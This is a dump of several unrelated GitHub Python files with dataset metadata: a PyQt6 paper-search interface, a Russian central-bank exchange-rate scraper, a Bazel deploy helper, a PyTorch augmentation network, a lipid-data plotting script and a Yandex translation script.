QFont('Share Tech')\n self.h_font = QFont('Audiowide')\n\n # Display banner\n label = QLabel('Papering')\n label.setFont(self.h_font)\n label.setAlignment(QtCore.Qt.AlignmentFlag.AlignHCenter)\n label.setStyleSheet(\n \"font-size: 110px;\" +\n \"margin-top: 40px;\" +\n \"font-weight: bold;\"\n )\n\n # Display the tagline\n subject = QLabel('subject')\n subject.setFont(self.font)\n subject.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n subject.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n year = QLabel('year')\n year.setFont(self.font)\n year.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n year.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n season = QLabel('season')\n season.setFont(self.font)\n season.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n season.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n paper = QLabel('paper')\n paper.setFont(self.font)\n paper.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n paper.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n # Create an SUBJECT WIDGET\n self.subject_list = QComboBox()\n self.subject_list.setFont(self.font)\n self.subject_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \" \n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n \n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n 
\"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar:vertical {\" # 滚动条样式\n \"width: 10px;\\n\"\n \"height: 100px;\"\n \"background-color: white; }\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar::handle:vertical {\\n\" # 滚动条样式\n \"background: black;}\\n\"\n )\n self.subject_list.setEditable(True)\n subject_data = PaperData()\n subject_list_arr = subject_data.subject()\n self.subject_list.addItems(subject_list_arr)\n\n # Create an YEAR WIDGET\n self.year_list = QComboBox()\n self.year_list.setFont(self.font)\n self.year_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar:vertical {\" # 滚动条样式\n \"width: 10px;\\n\"\n \"height: 100px;\"\n \"background-color: white; }\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar::handle:vertical {\\n\" # 滚动条样式\n \"background: black;}\\n\"\n )\n self.year_list.setEditable(True)\n year_data = PaperData()\n each_year = year_data.year()\n self.year_list.addItems(each_year)\n\n # Create an SEASON WIDGET\n self.season_list = QComboBox()\n self.season_list.setFont(self.font)\n self.season_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n )\n self.season_list.setEditable(True)\n self.season_list.addItems(['summer', 'winter', 'march'])\n\n # Create an PAPER WIDGET\n self.paper_list = QComboBox()\n self.paper_list.setFont(self.font)\n self.paper_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n 
\"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n )\n self.paper_list.setEditable(True)\n self.paper_list.addItems(['11', '12', '13', '...'])\n\n # Create a BUTTON WIDGET\n # 如果由多个object在图像中,需要谨慎加padding, margin。\n button = QPushButton(\"SEARCH\")\n button.setCursor(QCursor(QtCore.Qt.CursorShape.PointingHandCursor))\n button.setStyleSheet(\n \"*{border: 6px solid '#111111';\" +\n \"border-radius: 12px;\" +\n \"font-size: 30px;\" +\n \"font-weight: semi-bold;\"\n \"color: 'black';\" +\n \"padding: 10px 0;\" +\n \"margin: 0px 5px 35px}\" +\n \"*:hover{background: '#111111'; color: 'white'}\"\n )\n button.clicked.connect(self.search_button)\n # 直接等于函数名字,即可应用函数,不需要加括号\n\n # add the widget into a vertical layout\n subject_layout.addWidget(subject)\n subject_layout.addWidget(self.subject_list)\n\n year_layout.addWidget(year)\n year_layout.addWidget(self.year_list)\n\n season_layout.addWidget(season)\n season_layout.addWidget(self.season_list)\n\n paper_layout.addWidget(paper)\n paper_layout.addWidget(self.paper_list)\n\n # put all the widget component into a horizontal layout\n selection_layout.addLayout(subject_layout)\n selection_layout.addLayout(year_layout)\n selection_layout.addLayout(season_layout)\n selection_layout.addLayout(paper_layout)\n\n # add the widget into main vertical layout\n v_layout.addWidget(label)\n v_layout.addLayout(selection_layout)\n v_layout.addWidget(button)\n\n main_frame = QWidget()\n self.setCentralWidget(main_frame)\n main_frame.setLayout(v_layout)\n\n def search_button(self):\n current_subject = self.subject_list.currentText()\n current_year = self.year_list.currentText()\n current_season = self.season_list.currentText()\n current_paper = self.paper_list.currentText()\n # Search for the paper, if not found then return a window that shown error\n if current_paper == \"...\":\n error = QMessageBox()\n error.setText(\"Oh, It seems you are not enter a valid paper!\")\n error.setFont(self.font)\n error.setIcon(QMessageBox.Icon.Warning)\n error.setStyleSheet(\n \"font-size: 18px;\"\n )\n error.exec()\n else:\n openUrl(current_subject, current_year, current_season, current_paper)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Main()\n window.show()\n sys.exit(app.exec())\n", "repo_name": "JackSuuu/Papering", "sub_path": "papering_ui.py", "file_name": "papering_ui.py", "file_ext": "py", "file_size_in_byte": 10612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt6.QtWidgets.QMainWindow", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QHBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase.addApplicationFont", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt6.QtGui.QFontDatabase.addApplicationFont", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase", "line_number": 29, "usage_type": "name"}, {"api_name": 
"PyQt6.QtGui.QFont", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFont", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 36, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 36, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 54, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 70, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 77, "usage_type": "call"}, {"api_name": "papering_database.PaperData", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 122, "usage_type": "call"}, {"api_name": "papering_database.PaperData", "line_number": 162, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 202, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QPushButton", "line_number": 238, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QCursor", "line_number": 239, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 239, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 239, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QWidget", "line_number": 277, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QMessageBox", "line_number": 288, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QMessageBox.Icon", "line_number": 291, "usage_type": "attribute"}, {"api_name": "PyQt6.QtWidgets.QMessageBox", "line_number": 291, "usage_type": "name"}, {"api_name": "papering_def.openUrl", "line_number": 297, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QApplication", "line_number": 301, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 301, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "5244761113", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\n\nURL = \"http://www.cbr.ru/scripts/XML_daily.asp\"\n\n\ndef get_rates():\n rev = requests.get(URL)\n soup = BeautifulSoup(rev.content, \"xml\")\n\n rates = {\n i.CharCode.string: (\n Decimal(i.Value.string.replace(\",\", \".\")),\n int(i.Nominal.string),\n )\n for i in soup(\"Valute\")\n }\n\n return rates\n\n\ndef _main():\n rates = get_rates()\n\n result = (rates[\"AUD\"][0] / rates[\"AUD\"][1]) / (rates[\"BYN\"][0] / rates[\"BYN\"][1])\n print({\"cbr_course\": float(result.quantize(Decimal(\".01\")))})\n\n\nif __name__ == \"__main__\":\n _main()\n", "repo_name": "ultach/rocbank", "sub_path": "parse_cbr.py", "file_name": "parse_cbr.py", 
"file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 14, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "15759998198", "text": "import json\n\ndef run_command(args):\n deploy_template = \"bazel build --crosstool_top=//:arm_toolchain //tasks/{name}:{name}\"\n with open(args.config, \"r\") as f:\n dump = json.load(f)\n applications = dump[\"applications\"]\n cmds = []\n for app in applications:\n cmds.append(deploy_template.format(name=app))\n deploy_cmd = \"cd common && \"\n deploy_cmd += \" && \".join(cmds)\n print(deploy_cmd)\n\ndef setup(subparsers):\n parser = subparsers.add_parser(\"deploy\", help=\"deploy applications to device\")\n parser.add_argument(\"-c\", \"--config\", help=\"config file for device\", required=True)\n parser.add_argument(\"-d\", \"--device\", help=\"target device name\", required=True)\n parser.set_defaults(func=run_command)\n", "repo_name": "h3x4g0ns/bmpi", "sub_path": "tools/bmpi/deploy.py", "file_name": "deploy.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "33632011096", "text": "\"\"\"Utilities for scoring the model.\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport math\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef score(logits, labels):\n \"\"\"Returns the mean accuracy of a model's predictions on a set of examples.\n\n Args:\n logits (torch.Tensor): model predicted logits\n shape (examples, classes)\n labels (torch.Tensor): classification labels from 0 to num_classes - 1\n shape (examples,)\n \"\"\"\n\n assert logits.dim() == 2\n assert labels.dim() == 1\n assert logits.shape[0] == labels.shape[0]\n y = torch.argmax(logits, dim=-1) == labels\n y = y.type(torch.float)\n return torch.mean(y).item()\n\ndef increase_image_channels(images, num_out_channels, device):\n \"\"\"Updates an image with updated number of channels to feed into a pretrained model\n\n Args:\n image (torch.Tensor): batch image\n shape (B, C, H, W)\n num_out_channels: int\n \"\"\"\n temp = torch.empty((images.size(0), num_out_channels, images.size(2), images.size(3)))\n\n image_mean = torch.mean(images, axis = 1)\n for i in range(num_out_channels):\n if i < images.size(1):\n temp[:, i, :, :] = images[:, i, :, :]\n else:\n temp[:, i, :, :] = image_mean\n \n return temp.to(device)\n\n\n\nclass aug_net_block(nn.Module):\n\n def __init__(\n self,\n in_channel,\n out_channel,\n kernel_size,\n aug_noise_prob,\n num_augs,\n identity_init_off\n ):\n \"\"\"Inits the augmentation network for MetaAugNet on MAML\"\"\"\n super(aug_net_block, self).__init__()\n \n if identity_init_off:\n # Default initialization for conv layer in PyTorch\n # Uniform with min and max proportional to inverse sqrt of total kernel size\n n = in_channel\n n = kernel_size*kernel_size\n stdv = 1. 
/ math.sqrt(n)\n\n            self.conv_param = nn.Parameter(nn.init.uniform_(\n                torch.empty(\n                    out_channel,\n                    in_channel,\n                    kernel_size,\n                    kernel_size,\n                    requires_grad=True,\n                    device = DEVICE\n                ),\n                a = -stdv, \n                b = stdv\n            ))\n            self.conv_bias = nn.Parameter(nn.init.uniform_(\n                torch.empty(\n                    out_channel,\n                    requires_grad=True,\n                    device = DEVICE\n                ),\n                a = -stdv,\n                b = stdv\n            ))\n        else: \n            self.conv_param = nn.Parameter(nn.init.normal_(\n                torch.empty(\n                    out_channel,\n                    in_channel,\n                    kernel_size,\n                    kernel_size,\n                    requires_grad=True,\n                    device = DEVICE\n                ),\n                mean =0,# 0.000001\n                std = 1e-8\n            ))\n            self.conv_bias = nn.Parameter(nn.init.zeros_(\n                torch.empty(\n                    out_channel,\n                    requires_grad=True,\n                    device = DEVICE\n                )\n            )) \n        \n        self.conv_identity_weight = nn.init.dirac_(\n            torch.empty(\n                out_channel, \n                in_channel, \n                kernel_size, \n                kernel_size, \n                requires_grad = False,\n                device = DEVICE\n            )\n        )\n\n        self.aug_noise_prob = aug_noise_prob\n        self.num_augs = num_augs\n\n    def forward(self, x):\n        \"\"\"x: input image (N*S, C, H, W)\"\"\"\n        res = F.conv2d(input = x, weight = self.conv_identity_weight, bias = None, padding = 'same', stride = 1)\n        x = F.conv2d(\n            input = x,\n            weight = self.conv_param,\n            bias = self.conv_bias,\n            stride = 1,\n            padding = 'same'\n        )\n\n        B, C, H, W = x.size()\n        tB = int(B / self.num_augs)\n        # new way of generating augs\n        noise = torch.cat([nn.init.normal_(torch.empty((tB, C, H, W), \n                                    requires_grad = False, \n                                    device = DEVICE), \n                                    mean = 0, \n                                    std = 0.1*torch.std(x.detach()).item()\n                                    ) if random.uniform(0,1) < self.aug_noise_prob else nn.init.zeros_(torch.empty((tB, C, H, W), \n                                    requires_grad = False, \n                                    device = DEVICE)\n                                    ) for _ in range(self.num_augs)\n                            ], \n                            dim = 0\n                        )\n        assert noise.size() == x.size()\n        x = x + noise\n        # if random.uniform(0,1) < self.aug_noise_prob:\n        \n        #     x = x + nn.init.normal_(\n        #         torch.empty(\n        #             x.size(),\n        #             requires_grad=False,\n        #             device=DEVICE\n        #         ),\n        #         mean = 0,\n        #         std = 0.1*torch.std(x.detach()).item()\n        #     )\n        x = F.layer_norm(x, x.shape[1:])\n        x = torch.clamp(x, min=0)\n        return x + res\n\nclass mean_pool_along_channel(nn.Module):\n    def __init__(self):\n        super(mean_pool_along_channel, self).__init__()\n\n    def forward(self, x):\n        assert len(x.shape) == 4\n        return torch.mean(x, dim = [2,3])\n\n\nclass manual_relu(nn.Module):\n\n    def __init__(\n        self\n    ):\n\n        super(manual_relu, self).__init__()\n\n    def forward(self, x):\n        return torch.max(x, torch.zeros_like(x))\n\n\n\n    ", "repo_name": "alexzfan/MetaAugNet", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 6026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 69, "usage_type": "call"}, 
{"api_name": "torch.nn.init.uniform_", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.init.uniform_", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.init.dirac_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 139, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn.init.zeros_", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.functional.layer_norm", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 168, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 186, "usage_type": "call"}]} +{"seq_id": "12071636792", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n## 
figure settings\nfig,ax = plt.subplots(1,2,figsize=(13,6))\np0 = ax[0].twinx()\np1 = ax[1].twinx()\n\n\n## Number of lips vs poly/lip ratio\nelements = [\\\n['POPC',[2,4],[40.1,17.0],'skyblue','blue',[4.27,3.49]],\\\n['DMPC',[0.5,1.0,2.0],[96.6,74.9,42.8],'pink','red',[5.06,4.50,3.83]]]\n\nfor element in elements:\n name = element[0]\n Ratio = element[1]\n Nlip = element[2]\n color = element[3]\n color2 = element[4]\n Radius = element[5]\n\n ax[0].plot(Ratio,Nlip,linestyle='none',marker='s',markersize=9,color=color,label='Number of lipids, %s' % name)\n p0.plot(Ratio,Radius,linestyle='none',marker='x',markersize=6,color=color2,label='Average radius, %s' % name)\n\nax[0].plot([0,5],[15,15],linestyle='--',color='grey',label='estimate of phase transition')\n#ax[0].plot([0,5],[15,15],linestyle='--',color='grey',label='estimate of phase transition, discoidal -> spherical lipid particle')\nax[0].set_xlabel('Polymer/lipid ratio, R')\nax[0].set_ylabel('Number of lipids')\nax[0].set_ylim(0,100)\nax[0].set_xlim(0,5)\nax[0].text(2.0,70,'0 mol%s Chol' % '%')\n#ax[0].legend(loc='upper center',bbox_to_anchor=(1.1,1.1),fancybox=True,shadow=True,ncol=5)\nax[0].legend(loc='upper left',bbox_to_anchor=(1.2,.5),prop={'size':10},frameon=False)\np0.legend(loc='upper left',bbox_to_anchor=(1.2,.38),prop={'size':10},frameon=False)\n\nR_lim = [3.,5.15]\nR_ylabel = 'Radius [nm]'\np0.set_ylabel(R_ylabel)\np0.set_ylim(R_lim)\n\n## Number of lips vs chol\nelements = [\\\n#['POPC',[0,10,20,20],[17.1,13.8,5.5,5.7],'skyblue','blue',4,[34.9,34.3,30.4,31.9]],\\\n['POPC',[0,8,18,15],[17.0,13.8,5.6,5.9],'skyblue','blue',4,[3.49,3.43,3.04,3.20]],\\\n['DMPC',[0,1.4,1.4,3.3],[42.8,33.4,28.7,6.2],'pink','red',2,[3.83,3.63,3.67,3.10]]]\n\nfor element in elements:\n name = element[0]\n chol = element[1]\n Nlip = element[2]\n color = element[3]\n color2 = element[4]\n #Ratio = element[5]\n Radius= element[6]\n\n ax[1].plot(chol,Nlip,linestyle='none',marker='s',markersize=9,color=color,label='Number of lipids, %s' % name)\n p1.plot(chol,Radius,linestyle='none',marker='x',markersize=6,color=color2,label='Average radius, %s' % name)\n\nPT = 15 # estimate of phase transition\nax[1].plot([-1,21],[PT,PT],linestyle='--',color='grey',label='estimate of phase transition, discoidal -> spherical lipid particle') \nax[1].set_xlabel('mol%s cholesterol' % '%')\nax[1].set_ylabel('Number of lipids')\nax[1].set_ylim(0,100)\nax[1].set_xlim(-1,21)\nax[1].text(3.5,70,'R=4 for POPC, R=2 for DMPC')\n\np1.set_ylabel(R_ylabel)\np1.set_ylim(R_lim)\n\nplt.tight_layout()\nplt.savefig('output/Nlip.png')\nplt.show()\n\n", "repo_name": "andreashlarsen/Lenz2022-DIBMALPs", "sub_path": "plot_chol_vs_Nlip.py", "file_name": "plot_chol_vs_Nlip.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "27834515027", 
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n############################################################################################################\n#### Translates a piece of text or a word\n#### Automatic language detection\n#### Written by Vladimir Yakovlev \n#### Version 0.1.1\n############################################################################################################\n\n# All this packages should be available on any fresh macOS installation\nimport sys\nimport os\nimport json\nimport httplib\nimport urllib\nimport datetime\nimport string\n\n# Configuration goes here\nLOCAL = \"ru\" # change to your native or desired language, e.g. ru = Russian (see https://tech.yandex.ru/translate/doc/dg/concepts/api-overview-docpage/)\nFOREIGN = \"en\" # change to you desired foreign language, e.g. en = English\n\nAPIKEY = os.environ.get('APIKEY')\nif APIKEY is None:\n sys.stdout.write(\"APIKEY is not defined (see manual)\")\n sys.exit(1)\n\nif len(sys.argv) != 2:\n sys.stdout.write(\"Can't translate nothing\")\n sys.exit(2)\n\nINPUT=sys.argv[1]\n\n# get a json object from a request\ndef get_json(endpoint):\n conn = httplib.HTTPSConnection(\"translate.yandex.net\",\"443\")\n headers = {'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*'}\n params = urllib.urlencode({'text': INPUT})\n conn.request(\"POST\",\"/api/v1.5/tr.json/%s&key=%s\" % (endpoint, APIKEY), params, headers)\n\n response = conn.getresponse()\n\n if response.status != 200: # something nasty happened\n return None\n else:\n return json.loads(response.read()) # returns a json object for further work\n\n\n############################################################################################################\n#### Main Part\n############################################################################################################\nif __name__ == \"__main__\":\n src_json = get_json(\"detect?hint=%s,%s\" % (LOCAL, FOREIGN))\n if src_json == None or 'lang' not in src_json:\n sys.stdout.write(\"WARNING: Can't detect language for %s\" % INPUT)\n sys.exit(-1)\n\n # detects from/to languages key-pair\n source = src_json['lang']\n destination = FOREIGN\n if source != LOCAL:\n destination = LOCAL\n\n # tries to translate\n translation = get_json(\"translate?lang=%s-%s\" % (source, destination))\n if translation == None or 'text' not in translation:\n sys.stdout.write(\"WARNING: Can't translate %s from %s to %s\" % (INPUT, source, destination))\n sys.exit(-2)\n\n sys.stdout.write(translation['text'][0]) # all went good\n sys.exit(0)", "repo_name": "vyakovlev/alfred-ya.translator", "sub_path": "ya.translator.py", "file_name": "ya.translator.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stdout", 